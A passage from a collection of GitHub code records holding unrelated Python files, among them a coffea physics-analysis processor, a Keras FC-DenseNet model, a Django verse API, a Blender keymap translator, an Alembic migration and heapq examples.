tmp.slot1, axis=-1)] # this line should go before *any selection*, otherwise lep.jetIdx is not aligned with the jet index\n\n # Selecting jets and cleaning them\n cleanedJets[\"isGood\"] = isTightJet(getattr(cleanedJets, \"pt\"), cleanedJets.eta, cleanedJets.jetId, jetPtCut=30.) # temporary at 25 for synch, TODO: Do we want 30 or 25?\n goodJets = cleanedJets[cleanedJets.isGood]\n njets = ak.num(goodJets)\n\n\n #################### Event selection ####################\n\n # The event selection\n add2lMaskAndSFs(events, year, isData, sampleType)\n addLepCatMasks(events)\n\n\n ######### Weights ###########\n\n weights_object = coffea.analysis_tools.Weights(len(events),storeIndividual=True)\n if not isData: weights_object.add(\"norm\",(xsec/sow)*events[\"genWeight\"])\n else: weights_object.add(\"norm\",np.ones_like(events[\"event\"]))\n\n # Apply the flip rate to OS as a cross check\n weights_object.add(\"fliprate\", events.flipfactor_2l)\n\n # Print info\n #print(\"id0:\",l0.pdgId)\n #print(\"pt0:\",l0.pt)\n #print(\"eta0\",l0.eta)\n #print(\"id1:\",l1.pdgId)\n #print(\"pt1:\",l1.pt)\n #print(\"eta1\",l1.eta)\n #print(events.flipfactor_2l)\n\n\n ######### Store boolean masks with PackedSelection ##########\n\n # Get mask for events that have two sf os leps close to z peak\n sfosz_2l_mask = get_Z_peak_mask(l_fo_conept_sorted_padded[:,0:2],pt_window=30.0,flavor=\"os\")\n sfssz_2l_mask = get_Z_peak_mask(l_fo_conept_sorted_padded[:,0:2],pt_window=30.0,flavor=\"ss\")\n\n # Pass trigger mask\n pass_trg = trgPassNoOverlap(events,isData,dataset,str(year))\n\n # Charge masks\n charge2l_0 = ak.fill_none(((l0.charge+l1.charge)==0),False)\n charge2l_1 = ak.fill_none(((l0.charge+l1.charge)!=0),False)\n\n # Flavor mask\n sameflav_mask = (abs(l0.pdgId) == abs(l1.pdgId))\n\n # MC truth for flips\n #flip_l0 = (l0.gen_pdgId == -l0.pdgId)\n #flip_l1 = (l1.gen_pdgId == -l1.pdgId)\n #noflip_l0 = (l0.gen_pdgId == l0.pdgId)\n #noflip_l1 = (l1.gen_pdgId == l1.pdgId)\n #isprompt_2l = ( ((l0.genPartFlav==1) | (l0.genPartFlav == 15)) & ((l1.genPartFlav==1) | (l1.genPartFlav == 15)) )\n #truth_flip_mask = (isprompt_2l & (flip_l0 | flip_l1) & ~(flip_l0 & flip_l1)) # One or the other flips, but not both\n #truth_noflip_mask = (isprompt_2l & noflip_l0 & noflip_l1) # Neither flips\n\n # Selections\n selections = PackedSelection(dtype='uint64')\n selections.add(\"is_good_lumi\",lumi_mask)\n selections.add(\"os\", (charge2l_0))\n selections.add(\"ss\", (charge2l_1))\n selections.add(\"osz\", (charge2l_0 & sfosz_2l_mask))\n selections.add(\"ssz\", (charge2l_1 & sfssz_2l_mask))\n selections.add(\"2e\", (events.is2l_nozeeveto & events.is2l_SR & events.is_ee & (njets<4) & pass_trg))\n #if not isData:\n #selections.add(\"sszTruthFlip\", (charge2l_1 & sfssz_2l_mask & truth_flip_mask))\n #selections.add(\"oszTruthNoFlip\", (charge2l_0 & sfosz_2l_mask & truth_noflip_mask))\n #selections.add(\"ssTruthFlip\", (charge2l_1 & truth_flip_mask))\n #selections.add(\"osTruthNoFlip\", (charge2l_0 & truth_noflip_mask))\n\n\n ######### Variables for the dense and sparse axes of the hists ##########\n\n dense_var_dict = {\n \"invmass\" : (l0+l1).mass,\n \"njets\" : njets,\n \"l0pt\" : l0.pt,\n \"l0eta\" : l0.eta,\n \"l1pt\" : l1.pt,\n \"l1eta\" : l1.eta,\n }\n\n print(l0.pt)\n print(l1.eta)\n\n ########## Fill the histograms ##########\n\n hout = self.accumulator.identity()\n\n # Set the list of channels to loop over\n chan_lst = [\"osz\",\"ssz\"]\n #if not isData: chan_lst.append(\"sszTruthFlip\")\n #if not isData: 
chan_lst.append(\"sszTruthFlip2\")\n        #chan_lst = [\"ss\",\"os\",\"ssz\",\"osz\",\"ssTruthFlip\",\"osTruthNoFlip\",\"sszTruthFlip\",\"oszTruthNoFlip\"]\n\n        # Loop over histograms to fill (just invmass, njets for now)\n        for dense_axis_name, dense_axis_vals in dense_var_dict.items():\n\n            # Loop over the lepton channels\n            for chan_name in chan_lst:\n\n                # Get the cut mask object\n                cuts_lst = [\"2e\"]\n                cuts_lst.append(chan_name)\n                if isData: cuts_lst.append(\"is_good_lumi\")\n                cuts_mask = selections.all(*cuts_lst)\n\n                # Fill the histo\n                axes_fill_info_dict = {\n                    dense_axis_name : dense_axis_vals[cuts_mask],\n                    \"channel\" : chan_name,\n                    \"sample\" : histAxisName,\n                    \"weight\" : weights_object.weight()[cuts_mask],\n                }\n\n                hout[dense_axis_name].fill(**axes_fill_info_dict)\n\n        return hout\n\n    def postprocess(self, accumulator):\n        return accumulator\n","repo_name":"TopEFT/topeft","sub_path":"analysis/flip_measurement/flip_ar_processor.py","file_name":"flip_ar_processor.py","file_ext":"py","file_size_in_byte":13185,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"2675378491","text":"\nfrom tensorflow.keras import Model\nimport numpy as np\nimport string\nalphabet = list(string.ascii_uppercase)\n\n\ndef predict(model: Model, X_pred: np.ndarray) -> np.ndarray:\n    print(\"Predicting\")\n    y = model.predict(X_pred, verbose=False)\n    print(f\"Predicted shape {y.shape}\")\n    predicted_classes = np.argmax(y, axis=1)\n    print(\"Predicted classes\", predicted_classes)\n    predicted_letters = np.array(\n        [alphabet[predicted_class] for predicted_class in predicted_classes])\n    print(\"Predicted letters\", predicted_letters)\n    return predicted_letters\n","repo_name":"cpsnowden/swordle","sub_path":"sign_game/ml/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38864341229","text":"from builtins import len, int\nfrom django.shortcuts import render, redirect, get_object_or_404\n\n# Create your views here.\nfrom rest_framework.decorators import list_route\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom verses.models import Verse\nfrom verses.serializers import VerseSerializer\n\n\nclass VerseViewSet(ViewSet):\n    \"\"\"\n    A simple ViewSet for listing or retrieving verses.\n    \"\"\"\n\n    def list(self, request):\n        queryset = Verse.objects.all()\n        serializer = VerseSerializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def retrieve(self, request, pk=None):\n        queryset = Verse.objects.all()\n        verse = get_object_or_404(queryset, pk=pk)\n        serializer = VerseSerializer(verse)\n        return Response(serializer.data)\n\n    @list_route(methods=['GET'])\n    def filter(self, request):\n        gospel_key = request.query_params.get('gospel_key')\n        magic_number = int(request.query_params.get('magic_number'))\n\n        queryset = Verse.objects.filter(gospel=gospel_key)\n        len_queryset = len(queryset)\n        # (fixed) wrap the magic number into a valid index; the original integer-division\n        # scheme could still index past the end of the queryset\n        index = magic_number % len_queryset\n\n        serializer = VerseSerializer(queryset[index])\n        return Response(serializer.data)\n","repo_name":"jeancsanchez/Who-is-Jesus-Backend","sub_path":"verses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35621382199","text":"from keras.models import Model\nfrom keras.layers.core import
 Activation, Dropout, Reshape\nfrom keras.layers.convolutional import Convolution2D, Deconvolution2D\nfrom keras.layers.pooling import AveragePooling2D\nfrom keras.layers import Input, merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2\nimport keras.backend as K\n\nfrom layers import SubPixelUpscaling\nimport json\n\nclass Tiramisu():\n\n\n\n    def __init__(self, nb_classes, img_dim, nb_dense_block=5, growth_rate=12, nb_filter=16, nb_layers=4, upsampling_conv=128,\n                 bottleneck=False, reduction=0.0, dropout_rate=None, weight_decay=1E-4, upscaling_type='deconv',\n                 verbose=True):\n\n        self.nb_classes=nb_classes\n        self.img_dim=img_dim\n        self.nb_dense_block=nb_dense_block\n        self.growth_rate=growth_rate\n        self.nb_filter=nb_filter\n        self.nb_layers=nb_layers\n        self.upsampling_conv=upsampling_conv\n        self.bottleneck=bottleneck\n        self.reduction=reduction\n        self.dropout_rate=dropout_rate\n        self.weight_decay=weight_decay\n        self.upscaling_type=upscaling_type\n        self.verbose=verbose\n        self.model = self.create()  # (fixed) keep a handle on the built model; create()'s return value was discarded\n\n    def conv_block(self, input_tensor, nb_filter, bottleneck=False, dropout_rate=None, weight_decay=1E-4):\n        ''' Apply BatchNorm, Relu 3x3, Conv2D, optional bottleneck block and dropout\n\n        Args:\n            input_tensor: Input keras tensor\n            nb_filter: number of filters\n            bottleneck: add bottleneck block\n            dropout_rate: dropout rate\n            weight_decay: weight decay factor\n\n        Returns: keras tensor with batch_norm, relu and convolution2d added (optional bottleneck)\n\n        '''\n\n        concat_axis = 1\n\n        x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n                               beta_regularizer=l2(weight_decay))(input_tensor)\n        x = Activation('relu')(x)\n\n        if bottleneck:\n            inter_channel = nb_filter * 4  # Obtained from https://github.com/liuzhuang13/DenseNet/blob/master/densenet.lua\n\n            x = Convolution2D(inter_channel, 1, 1, init='he_uniform', border_mode='same', bias=False,\n                              W_regularizer=l2(weight_decay))(x)\n\n            if dropout_rate:\n                x = Dropout(dropout_rate)(x)\n\n            x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n                                   beta_regularizer=l2(weight_decay))(x)\n            x = Activation('relu')(x)\n\n        x = Convolution2D(nb_filter, 3, 3, init=\"he_uniform\", border_mode=\"same\", bias=False,\n                          W_regularizer=l2(weight_decay))(x)\n        if dropout_rate:\n            x = Dropout(dropout_rate)(x)\n\n        return x\n\n\n    def transition_down_block(self, input_tensor, nb_filter, compression=1.0, dropout_rate=None, weight_decay=1E-4):\n        ''' Apply BatchNorm, Relu 1x1, Conv2D, optional compression, dropout and Maxpooling2D\n\n        Args:\n            input_tensor: keras tensor\n            nb_filter: number of filters\n            dropout_rate: dropout rate\n            weight_decay: weight decay factor\n\n        Returns: keras tensor, after applying batch_norm, relu-conv, dropout, maxpool\n\n        '''\n\n        concat_axis = 1\n\n        x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n                               beta_regularizer=l2(weight_decay))(input_tensor)\n        x = Activation('relu')(x)\n        x = Convolution2D(int(nb_filter * compression), 1, 1, init=\"he_uniform\", border_mode=\"same\", bias=False,\n                          W_regularizer=l2(weight_decay))(x)\n        if dropout_rate:\n            x = Dropout(dropout_rate)(x)\n        x = AveragePooling2D((2, 2), strides=(2, 2))(x)\n\n        return x\n\n\n    def transition_up_block(self, input_tensor, nb_filters, type='deconv', output_shape=None, weight_decay=1E-4):\n        ''' deconv Upscaling (factor = 2)\n\n        Args:\n            input_tensor: keras tensor\n            nb_filters: number of layers\n            type:'deconv'.
 Determines type of upsampling performed\n            output_shape: required if type = 'deconv'. Output shape of tensor\n            weight_decay: weight decay factor\n\n        Returns: keras tensor, after applying batch_norm, relu-conv, dropout, maxpool\n\n        '''\n\n\n        x = Deconvolution2D(nb_filters, 3, 3, output_shape, activation='relu', border_mode='same',\n                            subsample=(2, 2))(input_tensor)\n\n        return x  # (fixed) the original fell through and returned None\n\n\n    def dense_block(self, x, nb_layers, nb_filter, growth_rate, bottleneck=False, dropout_rate=None, weight_decay=1E-4):\n        ''' Build a dense_block where the output of each conv_block is fed to subsequent ones\n\n        Args:\n            x: keras tensor\n            nb_layers: the number of layers of conv_block to append to the model.\n            nb_filter: number of filters\n            growth_rate: growth rate\n            bottleneck: bottleneck block\n            dropout_rate: dropout rate\n            weight_decay: weight decay factor\n\n        Returns: keras tensor with nb_layers of conv_block appended\n\n        '''\n\n        concat_axis = 1\n\n        feature_list = [x]\n\n        for i in range(nb_layers):\n            x = self.conv_block(x, growth_rate, bottleneck, dropout_rate, weight_decay)\n            feature_list.append(x)\n            x = merge(feature_list, mode='concat', concat_axis=concat_axis)\n            nb_filter += growth_rate\n\n        return x, nb_filter\n\n\n    def create(self):\n        ''' Build the create_dense_net model\n\n        Args:\n            nb_classes: Number of classes\n            img_dim: tuple of shape (channels, rows, columns) or (rows, columns, channels)\n            depth: number of layers\n            nb_dense_block: number of dense blocks to add to end (generally = 3)\n            growth_rate: number of filters to add per dense block\n            nb_filter: initial number of filters. Setting -1 indicates initial number of filters is 2 * growth_rate\n            nb_layers: number of layers in each dense block. Can be -1, a positive integer or a list\n\n                If -1, it computes the nb_layer from depth\n\n                If positive integer, a set number of layers per dense block\n\n                If list, nb_layer is used as provided.\n                Note that list size must be (nb_dense_block + 1)\n\n            upsampling_conv: number of convolutional layers in upsampling via subpixel convolution\n            bottleneck: add bottleneck blocks\n            reduction: reduction factor of transition blocks. Note : reduction value is inverted to compute compression\n            dropout_rate: dropout rate\n            weight_decay: weight decay\n            upscaling_type: method of upscaling. Can be 'subpixel' or 'deconv'\n            verbose: print the model type\n\n        Returns: keras tensor with nb_layers of conv_block appended\n\n        '''\n\n        batch_size = None\n\n        model_input = Input(shape=self.img_dim)\n\n        concat_axis = 1\n\n        _, rows, cols = self.img_dim\n\n\n        if self.reduction != 0.0:\n            assert self.reduction <= 1.0 and self.reduction > 0.0, \"reduction value must lie between 0.0 and 1.0\"\n\n        # check if upsampling_conv has minimum number of filters\n        # minimum is set to 12, as at least 3 color channels are needed for correct upsampling\n        assert self.upsampling_conv > 12 and self.upsampling_conv % 4 == 0, \"upsampling_conv number of channels must \" \\\n                                                                           \"be a positive number divisible by 4 and greater \" \\\n                                                                           \"than 12\"\n\n\n\n        # layers in each dense block\n        if type(self.nb_layers) is list or type(self.nb_layers) is tuple:\n            self.nb_layers = list(self.nb_layers)  # Convert tuple to list; (fixed) the original referenced an undefined bare nb_layers\n\n            assert len(self.nb_layers) == (self.nb_dense_block + 1), \"If list, nb_layer is used as provided. \" \\\n                                                                     \"Note that list size must be (nb_dense_block + 1)\"
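\n            # (added) e.g. nb_layers=[4, 5, 7, 10, 12, 15] with the default nb_dense_block=5: the last entry sizes the bottleneck-path block, and the first five size the down-path dense blocks.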
\n\n            final_nb_layer = self.nb_layers[-1]\n            self.nb_layers = self.nb_layers[:-1]\n\n        else:\n            final_nb_layer = self.nb_layers\n            self.nb_layers = [self.nb_layers] * self.nb_dense_block\n\n        if self.bottleneck:\n            self.nb_layers = [int(layer // 2) for layer in self.nb_layers]\n\n        # compute initial nb_filter if -1, else accept users initial nb_filter\n        if self.nb_filter <= 0:\n            self.nb_filter = 2 * self.growth_rate\n\n        # compute compression factor\n        compression = 1.0 - self.reduction\n\n        # Initial convolution\n        x = Convolution2D(48, 3, 3, init=\"he_uniform\", border_mode=\"same\", name=\"initial_conv2D\", bias=False,\n                          W_regularizer=l2(self.weight_decay))(model_input)\n\n        skip_connection = x  # (fixed) the original's mangled \"skinput_tensor_*\" names restored to skip_connection / skip_list\n        skip_list = []\n\n        # Add dense blocks and transition down block\n        for block_idx in range(self.nb_dense_block):\n            x, nb_filter = self.dense_block(x, self.nb_layers[block_idx], self.nb_filter, self.growth_rate, bottleneck=self.bottleneck,\n                                            dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n            # Skip connection\n            x = merge([x, skip_connection], mode='concat', concat_axis=concat_axis)\n            skip_list.append(x)\n\n            # add transition_block\n            x = self.transition_down_block(x, nb_filter, compression=compression, dropout_rate=self.dropout_rate,\n                                           weight_decay=self.weight_decay)\n            nb_filter = int(nb_filter * compression)\n\n            # Preserve transition for next skip connection after dense\n            skip_connection = x\n\n        # The last dense_block does not have a transition_down_block\n        x, nb_filter = self.dense_block(x, final_nb_layer, nb_filter, self.growth_rate, bottleneck=self.bottleneck,\n                                        dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n        out_shape = [batch_size, nb_filter, rows // 16, cols // 16]\n\n        # Add dense blocks and transition up block\n        for block_idx in range(self.nb_dense_block):\n            x = self.transition_up_block(x, nb_filters=self.upsampling_conv, type=self.upscaling_type, output_shape=out_shape)\n\n            out_shape[2] *= 2\n            out_shape[3] *= 2\n\n\n            x = merge([x, skip_list.pop()], mode='concat', concat_axis=concat_axis)\n\n            x, nb_filter = self.dense_block(x, self.nb_layers[-block_idx], nb_filter, self.growth_rate, bottleneck=self.bottleneck,\n                                            dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n        x = Convolution2D(self.nb_classes, 1, 1, activation='linear', border_mode='same', W_regularizer=l2(self.weight_decay),\n                          bias=False)(x)\n\n        channel, row, col = self.img_dim\n\n\n        x = Reshape((row * col, self.nb_classes))(x)\n\n        x = Activation('softmax')(x)\n\n        densenet = Model(input=model_input, output=x, name=\"create_dense_net\")\n\n        # Compute depth\n        nb_conv_layers = len([layer.name for layer in densenet.layers\n                              if layer.__class__.__name__ == 'Convolution2D'])\n\n        depth = nb_conv_layers - self.nb_dense_block  # For 1 extra convolution layer per transition up\n\n        if self.verbose: print('Total number of convolutions', depth)\n\n        if self.verbose:\n            if self.bottleneck and not self.reduction:\n                print(\"Bottleneck DenseNet-B-%d-%d created.\" % (depth, self.growth_rate))\n            elif not self.bottleneck and self.reduction > 0.0:\n                print(\"DenseNet-C-%d-%d with %0.1f compression created.\" % (depth, self.growth_rate, compression))\n            elif self.bottleneck and self.reduction > 0.0:\n                print(\"Bottleneck DenseNet-BC-%d-%d with %0.1f compression created.\" % (depth, self.growth_rate, compression))\n            else:\n                print(\"DenseNet-%d-%d created.\" % (depth, self.growth_rate))\n\n        return densenet
\n\n\n\nnb_layers = [4, 5, 7, 10, 12, 15]\nmodel = Tiramisu(nb_classes=12,img_dim=(3, 224, 224), nb_layers=nb_layers)\nmodel.model.summary()\n\nwith open('tiramisu_fc_dense103_model.json', 'w') as outfile:\n    outfile.write(json.dumps(json.loads(model.model.to_json()), indent=3))","repo_name":"0bserver07/One-Hundred-Layers-Tiramisu","sub_path":"fc-densenet-model.py","file_name":"fc-densenet-model.py","file_ext":"py","file_size_in_byte":12596,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"54"} +{"seq_id":"14936508848","text":"\"\"\"\nLittle script to convert blender keymaps to different keyboard layouts.\nCurrently only designed to replace letter keys and ;. \n\"\"\"\n\nimport re\n\ninput_kmp_path = \"blender_qwerty_keymap.py\" # source keymap file location\noutput_kmp_path = \"blender_colemakdh_keymap.py\" # output keymap file location\n\nsource_chars = \"QWERTYUIOPASDFGHJKL;ZXCVBNM\" # keys to replace\ntarget_chars = \"QWFPBJLUY;ARSTGMNEIOZXCDVKH\" # keys to replace with (in the same order)\n\nspecial_chars = {\n    ';': 'SEMI_COLON',\n}\n\ndef chars_to_kmp(chars):\n    kmp = []\n    for i in chars:\n        if i in special_chars.keys():\n            i = special_chars[i]\n        kmp.append(i)\n    \n    return kmp\n\nsource_kmp = chars_to_kmp(source_chars)\ntarget_kmp = chars_to_kmp(target_chars)\nprint(source_kmp)\n\ndef replace_key(match_obj):\n    if match_obj.group(1) in source_kmp:\n        return re.sub(r\"\\'.\\'\", f\"\\'{target_kmp[source_kmp.index(match_obj.group(1))]}\\'\", match_obj.group(0))\n    return match_obj.group(0)  # (fixed) leave unmapped keys unchanged; returning None made re.sub substitute 'None'\n\nwith open(input_kmp_path, 'r') as src:\n    input_kmp = src.readlines()\n\noutput_kmp = []\nfor line in input_kmp:\n    output_kmp.append(re.sub(r'\"type\": \\'(.)\\'', replace_key, line))\n\nwith open(output_kmp_path, 'w') as dest:\n    dest.writelines(output_kmp)\n\n\n    \n","repo_name":"b-init/keyboard_layout_switching_utils","sub_path":"blender_keymap_translator/bkmp_translator.py","file_name":"bkmp_translator.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38443235248","text":"from core.models import Product, Order, Review\nfrom rest_framework import serializers\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n    product_id = serializers.ReadOnlyField(source='pk')\n\n    class Meta:\n        model = Product\n\n\nclass ProductListSerializer(ProductSerializer):\n\n    class Meta:\n        model = Product\n        fields = ('product_id', 'name', 'url')\n\n\nclass OrderSerializer(serializers.HyperlinkedModelSerializer):\n    order_id = serializers.ReadOnlyField(source='pk')\n\n    class Meta:\n        model = Order\n\n\nclass OrderListSerializer(OrderSerializer):\n\n    class Meta:\n        model = Order\n        fields = ('order_id', 'url')\n\n\nclass OrderPostSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Use this serializer for POST as there is a requirement with the hyperlinked modelserializer to pass the full URL\n    rather than the product id.\n    \"\"\"\n    class Meta:\n        model = Order\n\n\nclass ReviewSerializer(serializers.HyperlinkedModelSerializer):\n    review_id = serializers.ReadOnlyField(source='pk')\n\n    class Meta:\n        model = Review\n\n\nclass ReviewListSerializer(ReviewSerializer):\n\n    class Meta:\n        model = Review\n        fields = ('review_id', 'url')\n\n\nclass ReviewPostSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Use this serializer for POST as there is a requirement with the hyperlinked modelserializer to pass the full URL\n    rather than the product id.\n    \"\"\"\n    class Meta:\n        model = 
Review\n\n\n\n\n\n","repo_name":"tabdon/django-react-shop-full","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"5850630342","text":"from MzingaShared.Core.EnumUtils import piece_names, EnumUtils\nfrom MzingaShared.Core import Position\n\n\nclass PiecePositionBase(object):\n __slots__ = \"position\", \"colour\", \"bug_type\", \"_piece_name\"\n\n def __init__(self):\n self.position = None\n self.colour = None\n self.bug_type = None\n self._piece_name = \"INVALID\"\n\n @property\n def piece_name(self):\n return self._piece_name\n\n @piece_name.setter\n def piece_name(self, value):\n self._piece_name = value\n\n if value != \"INVALID\":\n self.colour = EnumUtils.get_colour(value)\n self.bug_type = EnumUtils.get_bug_type(value)\n\n def parse(self, piece_string):\n if not self.try_parse(piece_string):\n raise ValueError(\"Unable to parse \\\"%s\\\".\" % piece_string)\n\n def try_parse(self, piece_string):\n if not piece_string or piece_string.isspace():\n raise ValueError(\"Invalid piece_string\")\n\n piece_string = piece_string.strip()\n\n try:\n sep = piece_string.find('[')\n name_string = piece_string[0:sep:]\n position_string = (piece_string[sep::]).replace('[', '').replace(']', '')\n self._piece_name = EnumUtils.parse_short_name(name_string)\n self.position = Position.parse(position_string)\n return True\n except ValueError:\n self._piece_name = \"INVALID\"\n self.position = None\n return False\n\n def __repr__(self):\n pos = self.position if self.position else \"\"\n return \"%s[%s]\" % (EnumUtils.get_short_name(self.piece_name), str(pos))\n","repo_name":"TylerGillson/mzinga-py-port","sub_path":"HiveOnline/MzingaShared/Core/PiecePositionBase.py","file_name":"PiecePositionBase.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"18753788254","text":"\"\"\"add columns mime type and lenngth for table file_content\n\nRevision ID: b0e256071ca3\nRevises: 014ea98c7b53\nCreate Date: 2023-09-04 14:42:46.980056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b0e256071ca3'\ndown_revision = '014ea98c7b53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('file_content', schema=None) as batch_op:\n batch_op.add_column(sa.Column('file_mime_type', sa.String(), nullable=True))\n batch_op.add_column(sa.Column('file_content_length', sa.Integer(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
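###\n    # (added note) batch_alter_table makes this migration portable to SQLite, whose\n    # ALTER TABLE support is limited; on backends such as Postgres it reduces to\n    # plain ALTER TABLE statements.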
\n    with op.batch_alter_table('file_content', schema=None) as batch_op:\n        batch_op.drop_column('file_content_length')\n        batch_op.drop_column('file_mime_type')\n\n    # ### end Alembic commands ###\n","repo_name":"mpaczes/python-tool-kit","sub_path":"flask_web_development_framework/car-owners-project/migrations/versions/b0e256071ca3_add_columns_mime_type_and_lenngth_for_.py","file_name":"b0e256071ca3_add_columns_mime_type_and_lenngth_for_.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27492352780","text":"import heapq\n\nheap = []\nheapq.heappush(heap, (1, 'one'))\nheapq.heappush(heap, (10, 'ten'))\nheapq.heappush(heap, (5,'five'))\n\nfor x in heap:\n\tprint(x)\n\nheapq.heappop(heap)\n\nfor x in heap:\n\tprint(x)\n\n# the smallest\nprint(heap[0])\n\n\nheap = [(1, 'one'), (10, 'ten'), (5,'five')]\nheapq.heapify(heap)\nfor x in heap:\n    print(x)\n\nheap[1] = (9, 'nine')\nfor x in heap:\n    print(x)\n\n\n\nimport heapq\n\n# initializing list 1\nli1 = [5, 7, 9, 4, 3]\n\n# initializing list 2\nli2 = [5, 7, 9, 4, 3]\n\n# using heapify() to convert list into heap\nheapq.heapify(li1)\nheapq.heapify(li2)\n\n# using heappushpop() to push and pop items simultaneously\n# pops 2\nprint(\"The popped item using heappushpop() is : \", end=\"\")\nprint(heapq.heappushpop(li1, 2))\n\n# using heapreplace() to push and pop items simultaneously\n# pops 3\nprint(\"The popped item using heapreplace() is : \", end=\"\")\nprint(heapq.heapreplace(li2, 2))\n\nli1 = [6, 7, 9, 4, 3, 5, 8, 10, 1]\n\n# using heapify() to convert list into heap\nheapq.heapify(li1)\n\n# using nlargest to print 3 largest numbers\n# prints 10, 9 and 8\nprint(\"The 3 largest numbers in list are : \", end=\"\")\nprint(heapq.nlargest(3, li1))\n\n# using nsmallest to print 3 smallest numbers\n# prints 1, 3 and 4\nprint(\"The 3 smallest numbers in list are : \", end=\"\")\nprint(heapq.nsmallest(3, li1))","repo_name":"Pkpallaw16/Data-Structure-And-Algorithms","sub_path":"16 Priority Queue/Heapq_functions.py","file_name":"Heapq_functions.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8184339909","text":"import scipy.io\r\nfrom torch.utils.data import Dataset,DataLoader\r\nfrom torchvision import transforms\r\nimport h5py\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\ndef zscorenorm(aaa):\r\n    bb = np.mean(aaa)\r\n    cc = aaa.std()\r\n    aaa = (aaa - bb)/cc\r\n    return aaa\r\n# '''\r\n# load the data\r\na=h5py.File('../newmachine2_1_10800_70.mat','r')\r\nqwe = [a[element[0]][:] for element in a['djg']]\r\n\r\na2=h5py.File('../newmachine_1_10800_70.mat','r')\r\nqwe2 = [a2[element[0]][:] for element in a2['djg']]\r\n\r\na3=scipy.io.loadmat('../newmachine_1_3077_70.mat')['djg']\r\nqwe3 = []\r\nfor i in range(3077):\r\n    for j in range(1):\r\n        qwe3.append(a3[j][i].T)\r\ndel qwe3[2559-1]\r\ndel qwe3[1505-1]\r\ndel qwe3[1502-1]\r\ndel qwe3[1492-1]\r\ndel qwe3[1491-1]\r\ndel qwe3[1487-1]\r\ndel qwe3[1485-1]\r\ndel qwe3[1483-1]\r\ndel qwe3[1482-1]\r\ndel qwe3[1481-1]\r\ndel qwe3[1480-1]\r\ndel qwe3[1476-1]\r\ndel qwe3[544-1]\r\ndel qwe3[525-1]\r\ndel qwe3[524-1]\r\ndel qwe3[493-1]\r\ndel qwe3[481-1]\r\ndel qwe3[455-1]\r\ndel qwe3[454-1]\r\n\r\na4=h5py.File('../newmachine34_1_6000_70.mat','r')\r\nqwe4 = [a4[element[0]][:] for element in a4['djg']]\r\n\r\na5=h5py.File('../newmachine_1_15000_70.mat','r')\r\nqwe5 = [a5[element[0]][:] for element in a5['djg']]
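\r\n# (added note) .mat files saved with -v7.3 are HDF5 containers: a['djg'] holds object references, so each element must be dereferenced with a[element[i]][:] to recover the underlying array.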
\r\n\r\na6=h5py.File('../newmachine_30_360_70_rand6.mat','r')\r\ndb = []\r\nqwe6 = []\r\nfor i in range(30):\r\n    da = [a6[element[i]][:] for element in a6['djg']]\r\n    db.append(da)\r\nfor i in range(360):\r\n    for j in range(30):\r\n        qwe6.append(db[j][i])\r\n\r\na7=h5py.File('../newmachine_1_5400_70.mat','r')\r\nqwe7 = [a7[element[0]][:] for element in a7['djg']]\r\n\r\nval_a=h5py.File('../newmachine_30_360_70_rand5.mat','r')\r\nval_db = []\r\nval_qwe = []\r\nfor i in range(30):\r\n    val_da = [val_a[element[i]][:] for element in val_a['djg']]\r\n    val_db.append(val_da)\r\nfor i in range(360):\r\n    for j in range(30):\r\n        val_qwe.append(val_db[j][i])\r\n\r\nb=scipy.io.loadmat('../newmachine2_1_10800_true.mat')['djg3']\r\ntwe = []\r\nfor i in range(10800):\r\n    for j in range(1):\r\n        twe.append(b[j][i])\r\n\r\nb2=scipy.io.loadmat('../newmachine_1_10800_true.mat')['djg3']\r\ntwe2 = []\r\nfor i in range(10800):\r\n    for j in range(1):\r\n        twe2.append(b2[j][i])\r\n\r\nb3=scipy.io.loadmat('../newmachine_1_3077_true.mat')['djg3']\r\ntwe3 = []\r\nfor i in range(3077):\r\n    for j in range(1):\r\n        twe3.append(b3[j][i])\r\ndel twe3[2559-1]\r\ndel twe3[1505-1]\r\ndel twe3[1502-1]\r\ndel twe3[1492-1]\r\ndel twe3[1491-1]\r\ndel twe3[1487-1]\r\ndel twe3[1485-1]\r\ndel twe3[1483-1]\r\ndel twe3[1482-1]\r\ndel twe3[1481-1]\r\ndel twe3[1480-1]\r\ndel 